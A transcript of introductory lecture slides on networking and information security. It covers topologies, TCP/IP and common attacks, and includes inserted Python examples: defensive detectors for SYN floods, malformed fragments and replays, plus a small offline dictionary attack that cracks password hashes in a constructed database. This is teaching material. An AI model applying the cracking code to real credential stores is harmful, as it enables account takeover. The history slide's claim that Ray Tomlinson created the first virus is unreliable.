MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY #SaeeJoshi #CyberSecurity#SaeeJoshi 1

Transcript of MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

Page 1: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY
#SaeeJoshi #CyberSecurity

OVERVIEW OF NETWORKING CONCEPTS

Agenda
• Basics of Communication Systems
• Transmission Media
• Topology and Types of Networks
• TCP/IP Protocol Stacks
• Wireless Networks
• The Internet

Basics of Communication Systems
• A communication system is a system that describes the information exchange between two points.
• The process of transmission and reception of information is called communication.
• The major elements of communication are the transmitter of information, the channel or medium of communication, and the receiver of information.

Block Diagram of Communication Systems

Elements Of Communication Systems
• Information
  • The message or information is the entity to be transmitted. It can be in the form of audio, video, temperature, picture, pressure, etc.
• Signal
  • The single-valued function of time that carries the information. The information is converted into an electrical form for transmission.
• Transducer
  • A device or arrangement that converts one form of energy to another. An electrical transducer converts physical variables such as pressure, force and temperature into corresponding electrical signal variations. Example: a microphone converts audio signals into electrical signals; a photodetector converts light signals into electrical signals.

Page 7: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

Elements Of Communication Systems • Amplifier

• The electronic circuit or device that increases the amplitude or the strength of the transmitted signal is called an amplifier. When the signal strength becomes less than the required value, amplification can be done anywhere in between transmitter and receiver. A DC power source will provide for the amplification.

• Modulator • As the original message signal cannot be transmitted over a large

distance because of their low frequency and amplitude, they are superimposed with high frequency and amplitude wave called carrier wave. This phenomenon of superimposing of message signal with a carrier wave is called modulation. And the resultant wave is a modulated wave which is to be transmitted.

• Again there are different types of Modulation.

• Amplitude Modulation (AM)

• Frequency Modulation (FM)

• Phase Modulation (PM)

CyberSecurity#SaeeJoshi 7

Elements Of Communication Systems
• Transmitter
  • The arrangement that processes the message signal into a form suitable for transmission and subsequent reception.
• Antenna
  • An antenna is a structure or device that radiates and receives electromagnetic waves, so antennas are used in both transmitters and receivers. An antenna is basically a metallic object, often a collection of wires. The electromagnetic waves are polarized according to the position of the antenna.
• Channel
  • A channel is a physical medium such as wire, cable or space through which the signal passes from the transmitter to the receiver. Many channel impairments affect channel performance to a pronounced degree; noise, attenuation and distortion are the major ones.

Transmission Media
• Transmission media is the communication channel that carries the information from the sender to the receiver.
• It is the physical path between transmitter and receiver in data communication.
• The main function of the transmission media is to carry the information through the network in the form of bits. Data is transmitted as electromagnetic signals.
• The electrical signals can be sent through copper wire, fiber optics, the atmosphere, water and vacuum.
• The characteristics and quality of data transmission are determined by the characteristics of the medium and of the signal.

Transmission Media
• Transmission media is of two types: wired media and wireless media. In wired media the medium characteristics are more important, whereas in wireless media the signal characteristics are more important.
• Different transmission media have different properties such as bandwidth, delay, cost, and ease of installation and maintenance.
• Bandwidth: all other factors remaining constant, the greater the bandwidth of a medium, the higher the data transmission rate of a signal.
• Transmission impairment: the received signal is not identical to the transmitted one because of transmission impairment. The quality of the signal is destroyed by transmission impairment.
• Interference: interference is the disruption of a signal as it travels over a communication medium by the addition of some unwanted signal.

Classification Of Transmission Media

Transmission Impairment
• Attenuation: attenuation means loss of energy, i.e., the strength of the signal decreases with increasing distance, which causes the loss of energy.
• Distortion: distortion occurs when there is a change in the shape of the signal. This type of distortion is seen with composite signals made up of different frequencies. Each frequency component has its own propagation speed, so the components arrive at different times, which leads to delay distortion.
• Noise: when data travels over a transmission medium, some unwanted signal is added to it, which creates noise.

Network Topology
• In computer networks there are mainly two types of topology:
  • Physical Topology: a physical topology describes the way in which the computers or nodes are connected with each other in a computer network. It is the arrangement of the various elements (links, nodes, etc.), including device location and cable installation, of a computer network. In other words, it is the physical layout of nodes, workstations and cables in the network.
  • Logical Topology: a logical topology describes the way data flows from one computer to another. It is bound to a network protocol and defines how data is moved throughout the network and which path it takes. In other words, it is the way in which the devices communicate internally.

Network Topology : Types
• There are mainly six types of physical topology:
  • Bus Topology
  • Ring Topology
  • Star Topology
  • Mesh Topology
  • Tree Topology
  • Hybrid Topology
• Now let us learn these topologies one by one.

Network Topology : Bus
• Bus topology is the simplest kind of topology, in which a common bus or channel is used for communication in the network. The bus is connected to various taps and drop lines.
• Taps are the connectors, while drop lines are the cables connecting the bus with the computer. In other words, there is only a single transmission line for all nodes.

Network Topology : Ring
• Ring topology is a topology in which each computer is connected to exactly two other computers to form a ring.
• Message passing is unidirectional and circular in nature.

Network Topology : Star
• Star topology is a computer network topology in which all the nodes are connected to a centralized hub.
• The hub or switch acts as middleware between the nodes. Any node requesting or providing a service first contacts the hub for communication.

Network Topology : Mesh
• Mesh topology is a computer network topology in which nodes are interconnected with each other.
• In other words, direct communication takes place between the nodes in the network.
• There are mainly two types of mesh:
  • Full Mesh: each node is connected to every other node in the network.
  • Partial Mesh: some nodes are not connected to every other node in the network.

Network Topology : Tree
• Tree topology is a computer network topology in which all the nodes are directly or indirectly connected to the main bus cable.
• Tree topology is a combination of bus and star topology.
• In a tree topology the whole network is divided into segments, which can be easily managed and maintained.
• There is a main hub, and all the other sub-hubs are connected to each other in this topology.

Network Topology : Hybrid
• A hybrid topology is a computer topology that combines two or more topologies. In practical use, hybrids are the most widely used.
• In this topology, topologies are interconnected according to need to form a hybrid. The good features of each topology can be used to make an efficient hybrid topology.

……… BREAK TIME ……… See you all in 5 min ……

Types of Network
• A communication network can be categorized by its size. A communication network is mainly of four types:
  • LAN (Local Area Network)
  • PAN (Personal Area Network)
  • MAN (Metropolitan Area Network)
  • WAN (Wide Area Network)

Types of Network : LAN (Local Area Network)
• A Local Area Network is a group of computers connected to each other in a small area such as a building or office.
• A LAN is used for connecting two or more personal computers through a communication medium such as twisted pair, coaxial cable, etc.
• It is less costly, as it is built with inexpensive hardware such as hubs, network adapters and Ethernet cables.
• Data is transferred at an extremely fast rate in a Local Area Network.
• A Local Area Network provides higher security.

Types of Network : LAN (Local Area Network)
• LAN examples:
  • Small company network
  • Educational labs
  • Housing complex networks

Types of Network : PAN (Personal Area Network)
• A Personal Area Network is a network arranged around an individual person, typically within a range of 10 meters (typically called a home network).
• A Personal Area Network is used for connecting computer devices of personal use.
• Thomas Zimmerman was the first research scientist to bring forward the idea of the Personal Area Network.
• A Personal Area Network covers an area of 30 feet.
• Personal computer devices used to build a personal area network are laptops, mobile phones, media players and PlayStations.

Types of Network : PAN (Personal Area Network)
• There are two types of Personal Area Network:
  • Wired Personal Area Network
  • Wireless Personal Area Network

Types of Network : MAN (Metropolitan Area Network)
• A metropolitan area network is a network that covers a larger geographic area by interconnecting different LANs to form a larger network.
• Government agencies use MANs to connect to citizens and private industries.
• In a MAN, the various LANs are connected to each other through a telephone exchange line.
• The most widely used protocols in MANs are RS-232, Frame Relay, ATM, ISDN, OC-3, ADSL, etc.
• It has a higher range than a Local Area Network (LAN).


Types of Network : WAN (Wide Area Network)
• A Wide Area Network is a network that extends over a large geographical area such as states or countries.
• A Wide Area Network is a much bigger network than a LAN.
• A Wide Area Network is not limited to a single location; it spans a large geographical area through telephone lines, fiber optic cable or satellite links.
• The Internet is one of the biggest WANs in the world.
• Wide Area Networks are widely used in business, government and education.

Types of Network : WAN (Wide Area Network)
• Examples of Wide Area Networks:
  • Mobile broadband
  • A telecom company
  • Private networks

TCP/IP Protocol Stacks
• A network protocol is an established set of rules that determine how data is transmitted between different devices in the same network.
• Essentially, it allows connected devices to communicate with each other regardless of any differences in their internal processes, structure or design.
• TCP/IP is the world's most widely used non-proprietary protocol suite because it enables computers using diverse hardware and software platforms, on different types of networks, to communicate.
• The protocols work equally well in both LANs and WANs.

TCP/IP Protocol Stacks
• TCP/IP is a collection of protocols named after its two best-known and most important protocols, the Transmission Control Protocol (TCP) and the Internet Protocol (IP).
• TCP/IP also includes several higher-level protocols that support common applications such as electronic mail, terminal emulation and file transfer.
• The TCP/IP protocol suite can be modeled as a layered protocol stack.
• It divides the protocols into four layers depending on the level of the data transfer process at which they are used.

TCP/IP Protocol Stacks
• The TCP/IP model has four layers. From lowest to highest, these are the link layer, the internet layer, the transport layer and the application layer, as shown below.

TCP/IP Protocol Layers

Wireless Networks
• Wireless networks are computer networks that are not connected by cables of any kind.
• Using a wireless network enables enterprises to avoid the costly process of introducing cables into buildings or as a connection between different equipment locations.
• The basis of wireless systems is radio waves, an implementation that takes place at the physical level of the network structure.
• There are four main types of wireless networks:
  • Wireless Local Area Network (LAN): links two or more devices using a wireless distribution method, providing a connection through access points to the wider Internet.
  • Wireless Metropolitan Area Network (MAN): connects several wireless LANs.
  • Wireless Wide Area Network (WAN): covers large areas such as neighboring towns and cities.
  • Wireless Personal Area Network (PAN): interconnects devices over a short span, generally within a person's reach.

Elements of Wireless Networks
• Wireless Access Point
  • A wireless communications hardware device that creates a central point of wireless connectivity. A wireless access point behaves much like a "hub" in that the total bandwidth is shared among all users for which the device is maintaining an active network connection.
• Wireless Port
  • Wireless ports provide both data and power service to the wireless access point and are clearly distinguished from ordinary network ports by an affixed yellow warning label.
  • Because wireless ports carry both data and electrical power, ordinary end-user devices could be severely damaged if they are connected to this type of port.
• Coverage Area
  • The geographical area in which acceptable wireless service quality is attainable. Coverage areas for similar devices can vary significantly due to building materials, interference, obstructions and access point placement.

Elements of Wireless Networks
• Interference
  • Degradation of a wireless radio signal caused by electromagnetic radiation from another source, including other wireless access points, cellular telephones, microwave ovens, medical and research equipment, and other devices that generate radio signals. Interference can either degrade a wireless transmission or eliminate it entirely, depending on the strength of the signal generated by the offending device.
• Privacy
  • The condition achieved by successfully maintaining the confidentiality of personal, student, employee and/or patient information transmitted over a wireless network.
• Security
  • Security is particularly important in wireless networks because data is transmitted using radio signals that, without specific data encryption mechanisms, can easily be intercepted.

The Internet
• The Internet is one of the most commonly used terms in today's world and plays a very important role in people's everyday lives.
• Definition: “A global system of interconnected computers, using a standardized Internet Protocol suite for communication and sharing information, is called the Internet.”
• The Internet completely revolutionized communication and technology across the globe. Initially, computerized devices were used only by large industries, but later their usage increased massively.
• It is also important to know that it is not possible for a single person to develop something as broad and wide as the Internet all by himself/herself.
• It was through the combined effort of multiple researchers and programmers that the Internet came into being.

Ways To Connect To Internet
The different ways in which one can connect to the Internet are discussed below in brief:
• Dial-Up – in such connections, users link their phone line to a computer to access the Internet. With this connection, the user cannot make or receive phone calls through their home phone service.
• Broadband – provided either through cable or phone companies, broadband is a high-speed Internet connection that is widely used today.
• Wireless Connection – Wi-Fi and mobile service providers fall under this category. Internet connectivity is made via radio waves, and the Internet can be connected to anywhere, irrespective of location. A few examples of wireless connection:
  • Wi-Fi – Wireless Fidelity, or Wi-Fi, allows high-speed Internet connectivity without the use of wires.
  • Mobile Phones – all smartphones are now equipped with an option for Internet connectivity, which can be availed using Internet vouchers and packs. No external connection or wire is required.
  • Satellite – where broadband connections are unavailable, satellites are used for wireless Internet connectivity.
• Integrated Services Digital Network – ISDN allows users to send audio or video data using telephone lines.

Facts to know
• The WWW
  • The terms World Wide Web (WWW) and the Internet are so often used interchangeably that the fundamental difference between the two is easily forgotten.
  • In simple words, the WWW is just a common point of connectivity for information sharing that is facilitated by a global network of computers.
  • The Internet, on the other hand, is a connection between computers and countless other devices that form a huge network of systems.
• IP Address
  • The Internet Protocol address is a numerical identification code assigned to any device connected to a network. It acts as an identification interface for Internet users.
• Web Browser
  • A web browser is a software application for accessing information on the World Wide Web. Commonly used web browsers include Google Chrome, Internet Explorer, Mozilla Firefox, etc.

THANK YOU ALL ………. Questions?


INFORMATION SECURITY CONCEPTS

Agenda
• Information Security Overview: Background and Current Scenario
• Types of Attacks
• Goals for Security
• E-commerce Security
• Computer Forensics
• Steganography

Information Security
• What is Information?
  • Information can be anything: your details, or we can say your profile on social media, the data in your mobile phone, your biometrics, etc.
• Information Security
  • Information Security is not only about securing information from unauthorized access.
  • Information Security is the practice of preventing unauthorized access, use, disclosure, disruption, modification, inspection, recording or destruction of information.
  • Thus Information Security spans many research areas such as Cryptography, Mobile Computing, Cyber Forensics, Online Social Media, etc.

Information Security : History
• Information security has come a very long way over the past half a century.
• 1960s: Password protection
  • It was during the 1960s that organizations first started to become more protective of their computers. During this time there was no internet or network to worry about.
  • So security was largely focused on physical measures, and on preventing access by people with enough knowledge of how to work a computer.
• 1970s: From CREEPER to Reaper
  • New cyber history began with a research project during the 1970s on what was then known as the ARPANET (the Advanced Research Projects Agency Network).
  • A researcher named Bob Thomas created a computer program that was able to move across ARPANET's network, leaving a small trail wherever it went.
  • This was edited by “Ray Tomlinson” to create the first computer virus. This revealed many security flaws in ARPANET.

Information Security : History
• Information security has come a very long way over the past half a century.
• 1980s: The internet goes mad
  • During the 1980s, the ARPANET network also became more commonly known as the internet, and became available to the public as the World Wide Web during 1989.
  • With the wide use of the internet, computer viruses became more advanced, and information security systems could not keep up with the constant barrage of innovative hacking approaches.
• 1990s: The rise of firewalls
  • With the internet becoming available to the public, more and more people began putting their personal information online.
  • Because of this, organized crime entities saw it as a potential source of revenue and started to steal data from people and governments via the web.
  • Firewalls and antivirus programs went some way to minimizing the risk of attacks, but computer viruses and worms kept coming thick and fast, so hackers definitely had the upper hand at the time.

Information Security : History
• Information security has come a very long way over the past half a century.
• 2000s: Proper punishment
  • In the early 2000s, governments began to clamp down on the criminality of hacking, giving much more serious sentences to those culpable – including extensive jail time and large fines.
• 2010s: The era of major breaches
  • Due to the consistent rise of technology, hacking became ever more complicated over the years that followed, and a number of major data breaches now largely define the era.
  • Information security is constantly improving, and many companies are designing a vast array of novel attack mitigation options that utilize things like Network Behavioral Analysis (NBA), web application firewalls (WAF) and Denial of Service (DoS) protection.

Types of Cyber Attacks
• A cyber attack is any type of offensive action that targets computer information systems, infrastructures, computer networks or personal computer devices, using various methods to steal, alter or destroy data or information systems.
• We define the 10 most common cyber attack types:
  • Denial-of-service (DoS) and distributed denial-of-service (DDoS) attacks
  • Man-in-the-middle (MitM) attack
  • Phishing and spear phishing attacks
  • Drive-by attack
  • Password attack
  • SQL injection attack
  • Cross-site scripting (XSS) attack
  • Eavesdropping attack
  • Birthday attack
  • Malware attack

Cyber Attack : DoS & DDoS
• 1. Denial-of-service (DoS) and distributed denial-of-service (DDoS) attacks
  • A denial-of-service attack overwhelms a system's resources so that it cannot respond to service requests.
  • A DDoS attack is also an attack on a system's resources, but it is launched from a large number of other host machines that are infected by malicious software controlled by the attacker.
  • Unlike attacks that are designed to enable the attacker to gain or increase access, denial-of-service doesn't provide direct benefits for attackers.
  • For some of them, it's enough to have the satisfaction of service denial. However, if the attacked resource belongs to a business competitor, then the benefit to the attacker may be real enough.
  • Another purpose of a DoS attack can be to take a system offline so that a different kind of attack can be launched. One common example is session hijacking.
  • There are different types of DoS and DDoS attacks; the most common are the TCP SYN flood attack, teardrop attack, smurf attack, ping-of-death attack and botnets.

Cyber Attack : DoS & DDoS
• TCP SYN flood attack
  • In this attack, an attacker exploits the use of buffer space during a Transmission Control Protocol (TCP) session initialization handshake.
  • The attacker's device floods the target system's small in-process queue with connection requests, but it does not respond when the target system replies to those requests.
  • This causes the target system to time out while waiting for the response from the attacker's device, which makes the system crash or become unusable when the connection queue fills up.
• Smurf attack
  • This attack uses IP spoofing and ICMP to saturate a target network with traffic. It uses ICMP echo requests targeted at broadcast IP addresses. These ICMP requests originate from a spoofed “victim” address. For instance, if the intended victim address is 10.0.0.10, the attacker would spoof an ICMP echo request from 10.0.0.10 to the broadcast address 10.255.255.255. This request would go to all IPs in the range, with all the responses going back to 10.0.0.10, overwhelming the network. This process is repeatable and can be automated to generate huge amounts of network congestion.
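As an added example (not part of the deck), the half-open-connection view a defender uses to recognise the SYN flood pattern described above: a handshake that saw a SYN but never the client's final ACK is counted against its listener once it has waited past a timeout. The event log, endpoint strings, thresholds and helper names are all constructed for this example.

```python
"""Spotting a TCP SYN flood from stale half-open connections (added example).

A normal handshake is SYN (client) -> SYN-ACK (server) -> ACK (client). In a
SYN flood the final ACK never arrives, so the server's connection queue fills
with half-open entries. This monitor replays a connection-event log and
reports listeners whose stale half-open count crosses a threshold.
"""
from collections import defaultdict

HANDSHAKE_TIMEOUT = 3.0   # seconds a SYN may wait for its ACK before it counts as stale
ALERT_THRESHOLD = 5       # stale half-open connections per listener that raise an alert

# Constructed sample, not a real capture: (time_s, src, dst, tcp_flags) with
# "S" = SYN, "SA" = SYN-ACK, "A" = ACK; ports are part of the endpoint string.
SAMPLE_EVENTS = [
    # one ordinary client completing its handshake with 192.0.2.10:443
    (0.0, "198.51.100.7:51000", "192.0.2.10:443", "S"),
    (0.1, "192.0.2.10:443", "198.51.100.7:51000", "SA"),
    (0.2, "198.51.100.7:51000", "192.0.2.10:443", "A"),
    # one recent, still-legitimate half-open connection on another listener
    (9.0, "198.51.100.9:40000", "192.0.2.20:22", "S"),
    (9.1, "192.0.2.20:22", "198.51.100.9:40000", "SA"),
]
# six SYNs to :443 from different sources that the server answers but that never get an ACK
SAMPLE_EVENTS += [
    (1.0 + i * 0.1, f"203.0.113.{i}:{40000 + i}", "192.0.2.10:443", "S") for i in range(6)
]
SAMPLE_EVENTS += [
    (1.05 + i * 0.1, "192.0.2.10:443", f"203.0.113.{i}:{40000 + i}", "SA") for i in range(6)
]


def half_open_connections(events):
    """Replay (time, src, dst, flags) events in time order and return
    {(client, server): syn_time} for handshakes that saw a SYN but no final ACK."""
    pending = {}
    for t, src, dst, flags in sorted(events, key=lambda e: e[0]):
        if flags == "S":
            pending.setdefault((src, dst), t)   # client opened a handshake
        elif flags == "A":
            pending.pop((src, dst), None)       # client completed it
        # "SA" is the server's reply; it does not change the client's state
    return pending


def detect_syn_flood(events, now, timeout=HANDSHAKE_TIMEOUT, threshold=ALERT_THRESHOLD):
    """Return {listener: (stale_half_open, distinct_source_ips)} for every
    listener with at least `threshold` half-open connections older than `timeout`."""
    stale = defaultdict(set)
    for (client, server), syn_time in half_open_connections(events).items():
        if now - syn_time > timeout:
            stale[server].add(client)
    return {
        server: (len(clients), len({c.rsplit(":", 1)[0] for c in clients}))
        for server, clients in stale.items()
        if len(clients) >= threshold
    }


if __name__ == "__main__":
    # Many distinct sources with no follow-up ACK is the distributed or spoofed
    # pattern; the usual server-side mitigations are SYN cookies and rate limits.
    for listener, (count, sources) in detect_syn_flood(SAMPLE_EVENTS, now=10.0).items():
        print(f"ALERT {listener}: {count} stale half-open connections from {sources} source IPs")
```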

Cyber Attack : DoS & DDoS
• Ping of death attack
  • This type of attack uses IP packets to 'ping' a target system with an IP size over the maximum of 65,535 bytes. IP packets of this size are not allowed, so the attacker fragments the IP packet. Once the target system reassembles the packet, it can experience buffer overflows and other crashes.
• Botnets
  • Botnets are the millions of systems infected with malware under hacker control in order to carry out DDoS attacks. These bots or zombie systems are used to carry out attacks against the target systems, often overwhelming the target system's bandwidth and processing capabilities. These DDoS attacks are difficult to trace because botnets are located in differing geographic locations.
• Teardrop attack
  • This attack causes the length and fragmentation offset fields in sequential Internet Protocol (IP) packets to overlap one another on the attacked host; the attacked system attempts to reconstruct the packets during the process but fails. The target system then becomes confused and crashes.
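Both the ping of death and the teardrop above abuse IP fragment reassembly, so one defensive check covers them: validate offsets, lengths and total size before copying any fragment data. This reassembler is an added example, not code from the deck; the Fragment type, the FragmentError class and the three fragment sets are constructed for it.

```python
"""Validating IP fragments before reassembly (added example).

A ping of death reassembles to more than the 65,535-byte maximum IPv4
datagram; a teardrop sends fragments whose offset and length overlap. A
reassembler that checks both before copying data rejects them cleanly.
"""
from dataclasses import dataclass

MAX_DATAGRAM = 65_535   # maximum IPv4 datagram length (header + payload), from the IP header field
IP_HEADER_LEN = 20      # minimal IPv4 header, assumed here (no options)


@dataclass(frozen=True)
class Fragment:
    ident: int       # IP Identification field shared by all pieces of one datagram
    offset: int      # Fragment Offset field, in 8-byte units as carried on the wire
    more: bool       # MF ("more fragments") flag
    payload: bytes


class FragmentError(ValueError):
    """Raised for any fragment set that must not be reassembled."""


def reassemble(fragments):
    """Return the reassembled payload or raise FragmentError.

    Checks: a single datagram id, no overlapping byte ranges (teardrop pattern),
    no gaps, a final fragment present, and total size within MAX_DATAGRAM
    (ping-of-death pattern). Fragments may arrive in any order.
    """
    if not fragments:
        raise FragmentError("no fragments")
    if len({f.ident for f in fragments}) != 1:
        raise FragmentError("fragments belong to different datagrams")
    pieces = sorted(fragments, key=lambda f: f.offset)
    expected_next = 0       # byte offset the next fragment must start at
    last_seen = False
    for f in pieces:
        start = f.offset * 8
        end = start + len(f.payload)
        if start < expected_next:
            raise FragmentError(f"overlapping fragment at byte {start} (teardrop pattern)")
        if start > expected_next:
            raise FragmentError(f"gap before byte {start}; datagram incomplete")
        if f.more and len(f.payload) % 8:
            raise FragmentError("non-final fragment length is not a multiple of 8")
        if IP_HEADER_LEN + end > MAX_DATAGRAM:
            raise FragmentError(
                f"reassembled size {IP_HEADER_LEN + end} exceeds {MAX_DATAGRAM} (ping of death pattern)")
        expected_next = end
        last_seen = not f.more
    if not last_seen:
        raise FragmentError("final fragment missing")
    return b"".join(f.payload for f in pieces)


def demo_cases():
    """Three constructed fragment sets (not captured traffic): a normal datagram,
    a teardrop-style overlap and a ping-of-death-style oversize. Returns {name: verdict}."""
    normal = [Fragment(1, 0, True, b"A" * 1480), Fragment(1, 185, False, b"B" * 100)]
    # second fragment claims to start at byte 1200, inside the first fragment's 1480 bytes
    teardrop = [Fragment(2, 0, True, b"A" * 1480), Fragment(2, 150, False, b"B" * 400)]
    # 45 fragments of 1480 bytes = 66,600 bytes of payload, more than a datagram may hold
    oversize = [Fragment(3, i * 185, i < 44, b"C" * 1480) for i in range(45)]
    verdicts = {}
    for name, frags in (("normal", normal), ("teardrop", teardrop), ("ping_of_death", oversize)):
        try:
            verdicts[name] = f"ok ({len(reassemble(frags))} bytes)"
        except FragmentError as exc:
            verdicts[name] = f"rejected: {exc}"
    return verdicts


if __name__ == "__main__":
    for name, verdict in demo_cases().items():
        print(f"{name:>14}: {verdict}")
```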

Page 53: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

Cyber Attack : MitM • Man-in-the-middle (MitM) attack

• A MitM attack occurs when an attacker inserts itself between a client and a server and relays, reads or alters the traffic between them while both sides believe they are talking directly to each other. Some common types of man-in-the-middle attacks:

• Session hijacking

• The attacker takes over an established session between a trusted client and a network server. The attacking computer substitutes its own IP address for the trusted client's, and the server continues the session believing it is still communicating with the client.

• IP Spoofing

• IP spoofing is used by an attacker to convince a system that it is communicating with a known, trusted entity in order to gain access. The attacker sends a packet whose IP source address is that of a trusted host instead of its own; the target may accept the packet and act upon it. Forging the source address is easy, seeing the replies is not, so spoofing works best against protocols that trust the address and need no return traffic.

• Replay

• A replay attack occurs when an attacker captures valid messages and retransmits them later, impersonating one of the participants. It is countered by binding every message to a timestamp or a nonce (a random value used only once) under a message authentication code, and having the receiver check the time window and remember nonces it has already accepted.
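The replay countermeasure named above, as an added example that is not part of the original slides: each message carries a timestamp and a fresh nonce and is authenticated with an HMAC under a pre-shared key (the key, the 30-second window and the message layout are assumptions for the demo). The receiver verifies the MAC first, then rejects stale timestamps, then rejects any nonce it has already seen.

```python
import hashlib
import hmac
import json
import os
import time

# Constructed pre-shared secret for the demo (assumption: both ends hold it).
SHARED_KEY = b"demo-shared-secret-not-for-production"
MAX_SKEW = 30   # seconds a message stays acceptable after its timestamp


def _mac(key, fields):
    """HMAC over a canonical encoding of every field except the MAC itself."""
    canon = json.dumps(fields, sort_keys=True, separators=(",", ":")).encode()
    return hmac.new(key, canon, hashlib.sha256).hexdigest()


def make_message(key, body, now=None, nonce=None):
    """Sender side: bind the body to a fresh nonce and a timestamp, then MAC."""
    fields = {
        "body": body,
        "ts": int(time.time() if now is None else now),
        "nonce": (os.urandom(16) if nonce is None else nonce).hex(),
    }
    return dict(fields, mac=_mac(key, fields))


class Receiver:
    """Receiver side: verify the MAC, reject stale timestamps, remember nonces."""

    def __init__(self, key, max_skew=MAX_SKEW):
        self.key = key
        self.max_skew = max_skew
        self.seen = {}   # nonce -> ts, pruned so it cannot grow without bound

    def accept(self, msg, now=None):
        """Return (ok, reason). Order matters: authenticate before trusting ts."""
        now = time.time() if now is None else now
        fields = {k: v for k, v in msg.items() if k != "mac"}
        if not hmac.compare_digest(_mac(self.key, fields), msg.get("mac", "")):
            return False, "bad mac"
        if abs(now - msg["ts"]) > self.max_skew:
            return False, "stale timestamp"
        # Forget nonces whose messages would now be stale anyway.
        self.seen = {n: t for n, t in self.seen.items() if now - t <= self.max_skew}
        if msg["nonce"] in self.seen:
            return False, "replay"
        self.seen[msg["nonce"]] = msg["ts"]
        return True, "ok"


def demo():
    """Walk through the cases: first delivery, replay, tampering, late replay."""
    rx = Receiver(SHARED_KEY)
    t0 = 1_700_000_000
    msg = make_message(SHARED_KEY, "transfer 100 to bob", now=t0)
    first = rx.accept(msg, now=t0 + 1)
    replayed = rx.accept(msg, now=t0 + 2)
    tampered = dict(msg, body="transfer 900 to bob")
    forged = rx.accept(tampered, now=t0 + 3)
    late = make_message(SHARED_KEY, "transfer 100 to bob", now=t0)
    stale = rx.accept(late, now=t0 + 3600)
    return first, replayed, forged, stale


if __name__ == "__main__":
    for label, result in zip(("first", "replayed", "tampered", "stale"), demo()):
        print(f"{label:9s} -> {result}")
```

The timestamp bounds how long the receiver must remember nonces; without it the seen-set would grow forever, and without the nonce two legitimate messages in the same second would be indistinguishable from a replay.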


Page 54: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

Cyber Attack : Phishing • Phishing and spear phishing attacks

• Phishing is the practice of sending emails that appear to come from trusted sources with the goal of harvesting personal information (credentials, card numbers) or inducing the recipient to take some action.

• It combines social engineering with technical trickery: the email may carry an attachment that loads malware onto the victim's computer, or a link to a look-alike website that tricks the victim into downloading malware or handing over credentials.

• Spear phishing is a targeted form of phishing. Attackers take the time to research their targets and craft messages that are personal and relevant (a colleague's name, a current project, a real supplier).

• Because of this, spear phishing is much harder to identify and harder to defend against with generic mail filtering; phishing-resistant authentication such as hardware security keys limits the damage when credentials are captured.

Page 55: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

Cyber Attack : Drive-by • Drive-by download attacks are a common method of spreading malware.

• Attackers look for insecure websites and plant a malicious script in the HTML or server-side (for example PHP) code of one of the pages. The script may exploit a vulnerability in the visitor's browser or a plugin to install malware directly, or it may redirect the victim to a site the attackers control that does so.

• Drive-by downloads can happen when visiting a website, viewing an HTML email message or opening a pop-up window.

• Unlike many other attacks, a drive-by does not rely on the user actively enabling it: you do not have to click a download button or open a malicious attachment to become infected. Because it depends on an exploitable client-side bug, keeping the browser and its plugins patched is the primary defence.

Page 56: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

Cyber Attack : Password • Because passwords are the most commonly used mechanism to authenticate users to an information system, obtaining passwords is a common and effective attack approach.

• A person's password can be obtained by looking around their desk, "sniffing" the network connection to capture passwords sent unencrypted, using social engineering, gaining access to a password database, or outright guessing.

• Guessing can be done in either a random or a systematic manner:

• Brute-force password guessing tries many candidate passwords in the hope that one works, either exhaustively or guided by information about the person (name, job title, hobbies, birth year and similar items).

• In a dictionary attack, a list of common passwords is tried against the account. Password databases normally store a hash of each password rather than the password itself, so the offline variant copies the hash file, hashes every dictionary word with the same algorithm (and, if one is used, the same per-user salt) and compares the results. An unsalted hash lets the attacker hash each word once and match it against every account at the same time.
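The offline dictionary attack just described, as an added example that is not part of the original slides. The wordlist, the accounts and the SHA-256(salt || password) storage scheme are all constructed for the demo (real systems should use a slow, salted hash such as bcrypt, scrypt or Argon2); the point it shows is the work difference between an unsalted store, where one hash per word covers every account, and a salted one, where every account costs a full pass over the wordlist.

```python
import hashlib
import os

# Constructed wordlist and accounts; not real data.
WORDLIST = ["123456", "password", "qwerty", "letmein", "Password@123", "dragon"]
USERS = {"alice": "letmein", "bob": "letmein", "carol": "correct horse battery"}


def hash_password(password, salt=b""):
    """Toy scheme standing in for the target's store: SHA-256(salt || password).
    Assumption for the demo; real systems should use bcrypt, scrypt or Argon2."""
    return hashlib.sha256(salt + password.encode()).hexdigest()


def build_unsalted_db():
    """user -> hash, the way a naive application stores credentials."""
    return {u: hash_password(p) for u, p in USERS.items()}


def build_salted_db():
    """user -> (salt, hash) with a random per-user salt."""
    db = {}
    for u, p in USERS.items():
        salt = os.urandom(16)
        db[u] = (salt, hash_password(p, salt))
    return db


def crack_unsalted(db, wordlist):
    """Hash each word ONCE and look it up against every account: without salts
    the attacker amortises the work over all users (and can precompute tables).
    Returns (user -> recovered password, number of hash operations)."""
    table = {hash_password(w): w for w in wordlist}
    found = {u: table[h] for u, h in db.items() if h in table}
    return found, len(wordlist)


def crack_salted(db, wordlist):
    """With salts every account needs its own pass over the wordlist."""
    found, work = {}, 0
    for u, (salt, h) in db.items():
        for w in wordlist:
            work += 1
            if hash_password(w, salt) == h:
                found[u] = w
    return found, work


if __name__ == "__main__":
    plain = build_unsalted_db()
    print("unsalted:", crack_unsalted(plain, WORDLIST))
    print("alice and bob share a hash:", plain["alice"] == plain["bob"])
    print("salted:  ", crack_salted(build_salted_db(), WORDLIST))
```

Note the second leak in the unsalted case: alice and bob have identical hashes, so password reuse is visible before a single guess is made.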


Page 57: MODULE 1: PRE-REQUISITES IN INFORMATION AND NETWORK SECURITY

Cyber Attack : SQL injection • SQL injection has become a common issue with database-driven websites.

• It occurs when an attacker gets the application to execute SQL of the attacker's choosing by supplying crafted input that the server concatenates into a query.

• SQL fragments are inserted into data-plane input (for example in place of the login name or password) so that the database interprets them as part of the query's code rather than as data.

